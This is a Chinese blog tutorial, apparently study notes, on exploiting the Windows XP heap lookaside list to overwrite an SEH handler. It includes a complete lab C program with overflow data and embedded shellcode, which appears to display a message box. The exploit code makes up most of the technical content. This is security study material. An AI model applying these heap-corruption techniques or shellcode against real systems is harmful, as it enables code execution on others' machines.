利用快表lookaside进行对溢出

最新推荐文章于 2020-07-21 19:47:45 发布
最新推荐文章于 2020-07-21 19:47:45 发布
阅读量725 收藏
点赞数
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/22397707
版权

块表   也就是  lookaside表!!!!!!


这种方法   很难  

条件:

1 memcpy 赋值

2 使用块表  有HeapAlloc 和 HeapFree后还有赋值等

3 两次 赋值

总的来说  这个知识点很重要  XP 下还可以


先构造如下:

后面发现  将  SEH handler 设置为  0x0012ffe4 更好些!!!!!!!!!!

#include <stdio.h>
#include <windows.h>

	char shellcode []=
	"\xEB\x40\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充
	"\x03\00\x03\x00\x5C\x01\x08\x99"//填充
	"\xE4\xFF\x12\x00"//用默认异常处理函数指针所在位置覆盖
	;
void main()
{
	HLOCAL h1,h2,h3;
	HANDLE hp;
	hp = HeapCreate(0,0,0);
	__asm int 3
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	HeapFree(hp,0,h3);
	HeapFree(hp,0,h2);
	memcpy(h1,shellcode,300);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	memcpy(h3,"\x90\x1E\x39\x00",4);
	int zero=0;
	zero=1/zero;
	printf("%d",zero);

}


释放之前:



第一次释放之后   块表区被修改了lookaside[2] 指向  被释放的块h3 块首中的下一堆块指针(因为我们先释放的h3)


经过两次释放之后   块表区被修改了lookaside[2] 指向 被释放的块h2 块首中的下一堆块指针


接下来看看    快表的堆块:


接下来开始赋值shellcode ··············



追寻  下一个  申请空间函数   进入  发现 将  lookaside[2] 的下一块首地址 赋值为了我们构造的 SEH handler 0x0012ffe4

(也就是 lookaside[2] 地址的值指向的值   再赋值到    lookaside[2] 地址上来)


只要向这个刚申请的空间中写入 shellcode就可以覆盖 SEH handler  接着



接着到达下面

注意这里的eax即为申请的内存地址·······  而这个地址恰恰就是  两次HeapFree之后的lookaside[2]的地址指向的值

接着





(也就是 lookaside[2] 地址的值指向的值   再赋值到    lookaside[2] 地址上来)



注意这里申请的地址 为   上一次  lookaside[2]的地址指向的值  也就是我们特殊构造的 SEH handler  地址   往这个地址赋值旧改变 异常处理流程了




最后往里面  赋值   003A1E90


触发异常后   eb 40 是我们特殊构造的  这里的值不会被程序覆盖掉




最终代码:

#include <stdio.h>
#include <windows.h>

	char shellcode []=
	"\xEB\x40\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充
	"\x03\00\x03\x00\x5C\x01\x08\x99"//填充
	"\xb4\xFF\x12\x00"//用默认异常处理函数指针所在位置覆盖 //根据实际情况调整

	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充

	"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
	"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
	"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
	"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
	"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
	"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
	"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
	"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
	"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
	"\x53"
	"\x68\x64\x61\x30\x23"
	"\x68\x23\x50\x61\x6E"
	"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";

void main()
{
	HLOCAL h1,h2,h3;
	HANDLE hp;
	hp = HeapCreate(0,0,0);
	//__asm int 3
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	HeapFree(hp,0,h3);
	HeapFree(hp,0,h2);
	memcpy(h1,shellcode,300);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
	memcpy(h3,"\x90\x1E\x3a\x00",4);//根据实际情况调整
	int zero=0;
	zero=1/zero;
	printf("%d",zero);
}













pandamac
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第5章 堆溢出利用_结构分析
yellow的博客
05-12 510
结构分析
溢出利用
wangtiankuo的博客
10-10 1346
本文整理自《0day安全:软件漏洞分析技术》 1 堆 2 代码 #include "stdafx.h" #include &lt;Windows.h&gt; int _tmain(int argc, _TCHAR* argv[]) { //HANDLE和HLOCAL 是 void* HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp=HeapCre...
xp下调试堆溢出(下)--利用
lixiangminghate的专栏
07-07 870
前一篇简单阐释了分配的原理,并在文章的结尾提到xp sp1以前的OS并不对分配出去的地址进行检查。本文简单演示利用这个漏洞。建议程序在win2k上以命令行运行 #include #include int main(int argc,char* argv[]) { HLOCAL h1,h2,h3,h4; char* pi=NULL; HANDLE hp; char* str=
溢出(三)DWORD SHOOT
Reshahar 的博客
03-20 1338
Windows 堆溢之DWORD SHOOT By Rweb@Reshahar 0x000 环境 1. 虚拟机 VirtualBox 5.0.20 2. 系统 windows 2000 Kali linux 3. 工具 VC++6.0 OllyDbg 1.10 汉化版 AsmToE v5.20 0x001堆溢出
windows堆溢出原理
03-02
最重要的两种堆是空闲双向链(freelist)和速单向链Lookaside)。空的组织方式是:堆区一开始的堆区中有一个 128 项的指针数组,称作空索引,该数组的每一项包含两个指针,用于标识一个空。 在 ...
Pagetable:多页页面
03-09
例如,现代处理器常常会有硬件支持的页行走(翻译),如Intel的 Translation Lookaside Buffer (TLB) 和 AMD的 Translation Lookaside Buffer (TLB) 预加载,它们缓存最近使用的页项,以减少访问内存的次数。...
让你的PHP7更之Hugepage用法分析
10-22
这种分页方式虽然灵活,但因为页项多,可能导致TLB(Translation Lookaside Buffer)缓存命中率下降,影响内存访问速度。Hugepage通过增大页面大小,减少了页的条目数量,从而减少了TLB的缓存缺失,提升了性能。...
让你的PHP7更之Hugepage用法分析_.docx
10-10
默认情况下,操作系统以4KB的小页进行内存分配,每次内存访问都需要通过TLB(Translation Lookaside Buffer)进行虚拟地址到物理地址的转换。小页意味着TLB中需要存储更多的条目,当TLB缓存不足时,会导致频繁的TLB...
对ARM中MMU映射过程的理解
08-05
"对ARM中MMU映射过程的理解" MMU(Memory Management Unit,内存管理单元)是ARM处理器中的一种硬件组件,负责虚拟地址到物理地址的映射和内存访问控制。ARM中MMU映射过程是指MMU将虚拟地址(VA)转换为物理地址...
Lookaside结构
qq_41490873的博客
07-21 438
在内核中,频繁的申请和释放内存。容易造成大量的内存碎片。 ddk提供了一种解决方式,使用Lookaside对象。该对象会一次性申请一个大的内存,以后每次需要内存的时候就到这个对象中去拿 Lookaside对象内部的内存不够用时,它会向操作系统申请更多的内存。当Lookaside对象 内部有大量的未使用的内存时,它会自动让Windows回收一部分内存。 总之,Lookaside 是一个自动的内存分配容器。通过对Lookaside对象申请内存,效率要高于直接向Windows 申请内存。Lookaside 一-般
Ring0 - Lookaside结构
weixin_34146410的博客
09-10 122
由于频繁的申请,回收内存会导致在内存上产生大量的内存"空洞".这时使用Lookaside. 1.每次申请固定大小的内存. 2.申请和回收的操作十分频繁. 实现原理: 他先向windows申请了一块比较大的内存.而后以后申请内存都从Lookaside对象申请.这样就会避免内存"空洞",Lookaside对象内部的内存不够用时,他会向操作系统申请更多内存.当Lookaside内部有大量的...
Windows内存管理(2)--Lookaside结构 和 运行时函数
收集学习过程中对自己有帮助的牛人文章
11-29 534
转载自:http://mzf2008.blog.163.com/blog/static/355997862010111005639785/ 1.      Lookaside结构 频繁的申请和回收内存,会导致在内存上产生大量的内存“空洞”,从而导致最终无法申请内存。DDK为程序员提供了Lookaside结构来解决这个问题。 我们可以将Lookaside对象看成是一个内存容器。在初始化
windows内核驱动内存管理之Lookaside使用
Geons的花园阳台
03-27 1433
Windows内存管理中使用了类似于容器的东西,叫做Lookaside对象,每次程序员申请内存都会从Lookaside里面申请,只有不足的时候,Lookaside才会向内存又一次申请内存空间,这样减少了频繁申请内存而导致的内存碎片。 当Lookaside对象内部有大量没有使用的内存时候,它会自动让windows回收一部分内存,总之,Lookaside很智能。 一般Lookaside用于以下情况
什么是 LookasideList
07-13 2149
首先分配一个块内存, 然后让系统自己进行管理   针对这块内存判断其属性是分页的,还是非分页的。分别调用不同的函数, 来初始化这块    内存,来构造一个Lookaside。   分页的使用ExInitializePagedLookasideList函数    非分页的使用 ExInitializeNonpagedLookasideList函数    E
MS05-043漏洞利用分析以及ntdll!RtlFreeHeap中关于lookaside的操作
10-04 1083
环境:windows2000 sp4 Rollup1使用工具:IDA v4.7softice这个漏洞出问题的代码是spoolsv.exe静态加载spoolss.dll,由spoolss.dll动态加载win32spl.dll中的函数:AddPrinterW具体可以参见:http://blog.0x557.org/Sandro/archives/0day_develop/index.html(同时
SQLite3源码学习(11)lookaside分析
test
01-31 1128
1.概述        SQLite数据库连接会进行许多小的、短期的内存分配。当用sqlite3_prepare_v2()编译SQL语句时这种情况最常见。这些小的内存分配用来存储诸如名和列名,解析树节点、单独的查询结果、B-Tree游标对象。这会导致频繁地调用malloc()和free(),用掉分配给SQLite的大部分CPU时间片。 SQLite引入lookaside来帮助减小分配内存的
Lookaside List 详解
yangdazhi的专栏
10-30 2186
使用 Lookaside List 分配内存 概述lookaside list 节点结构节点内存块 size初始化节点分配内存释放内存动态调整 lookaside list 节点深度 1. 概述 windows 提供了一种基于 lookaside list 的速内存分配方案,区别于一般的使用 ExAllocatePoolWithTag() 系列函数的内存分配方式。每次从 loo
具有时是如何实现地址变换的
最新发布
06-02
(Translation Lookaside Buffer,TLB)是一种用于减少虚拟地址转换时间的高速缓存。当CPU执行访问虚拟地址的指令时,会首先在TLB中查找对应的物理地址,如果TLB中存在,则直接从TLB中获取对应的物理地址,否则需要进行完整的地址转换。在存在TLB的情况下,地址变换的过程会被优化为以下步骤: 1. 指令中的虚拟地址被送往地址转换部件。 2. 地址转换部件检查TLB中是否有该虚拟地址的映射。 3. 如果TLB中存在该虚拟地址的映射,直接从TLB中获取对应的物理地址。 4. 如果TLB中不存在该虚拟地址的映射,则需要进行完整的地址转换过程,将虚拟地址转换为物理地址。 5. 将转换得到的物理地址存放到TLB中,以便下次访问时可以直接从TLB中获取。 总之,通过提前缓存一部分地址映射信息,实现了更速的地址转换,从而提高了CPU的执行效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值